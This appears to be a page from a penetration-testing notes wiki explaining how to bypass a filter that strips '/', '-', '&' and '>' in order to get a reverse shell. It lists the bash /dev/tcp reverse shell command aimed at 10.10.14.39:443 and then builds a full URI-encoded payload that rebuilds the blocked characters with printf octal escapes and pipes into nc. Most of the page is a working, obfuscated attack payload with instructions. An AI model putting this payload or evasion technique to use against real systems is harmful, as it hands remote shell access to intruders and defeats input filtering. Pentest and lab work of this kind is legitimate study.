Using ENV to escape Bad Characters

Characters '/ > & -' are not processed. But we want a reverse tcp one liner. We can workaround these characters using the following methods

Basically our reverse shell command /bin/bash -i >& /dev/tcp/10.10.14.39/443 0>&1 will not be executed successfully as / characters are being replaced. How do we get around this?

If Env contains a variable we can use. For example, the / character is being escaped during our exploitation phase to get a reverse shell.

# Env contains a variable
OLDPWD=/
HOME=/
PHP_FCGI_MAX_REQUESTS=500
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin
LANG=en_US.ISO8859-1
PHP_FCGI_CHILDREN=1
PWD=/var/db/rrd

Looking at the above Env values We can replace '$(HOME)' with /

And format the '$LANG' variable as such IN NON-BSD:

But If the OS is BSD format so we are not able to format it like above, instead we use linux printf

We can test out we will print out a reverse shell command with replaced badcharacters

# - character
a=$(printf "\55")	

# / character
b=$(printf "\57")	

# & character
c=$(printf "\46")

# > character
d=$(printf "\76")

For this example, since the full payload will be URI encoded, the space characters will be encoded as '+'. The reverse shell payload will now be

a=$(printf+"\55");b=$(printf+"\57");c=$(printf+"\46");d=$(printf+"\76");echo+${b}bin${b}bash+${a}i+${d}${c}+${b}dev${b}tcp${b}10.10.14.39${b}443+0${d}${c}1|nc+10.10.14.39+443

Which converts successfully to the reverse shell command that was not working previously

PreviousReverse shell Nextshellshock

Last updated 5 years ago